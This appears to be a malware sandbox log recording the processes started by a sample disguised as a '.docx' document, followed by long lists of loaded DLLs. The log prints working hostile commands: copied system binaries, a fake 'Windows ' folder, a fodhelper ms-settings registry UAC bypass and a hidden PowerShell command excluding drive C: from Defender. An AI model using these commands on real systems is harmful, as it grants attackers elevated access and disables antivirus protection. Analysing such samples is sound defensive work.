Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe C:\\Users\\Public\\Libraries\\Pyemdbrd.PIF
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
Source: unknown	Process created: C:\Windows\System32\SystemSettingsAdminFlows.exe "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process created: C:\Users\Public\Libraries\drbdmeyP.pif C:\Users\Public\Libraries\drbdmeyP.pif	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe C:\\Users\\Public\\Libraries\\Pyemdbrd.PIF	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat C:\Users\Public\Libraries\drbdmeyP.pif"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
Source: C:\Users\Public\alpha.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: aclui.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: nltdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: nltdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: smartscreenps.dll	Jump to behavior
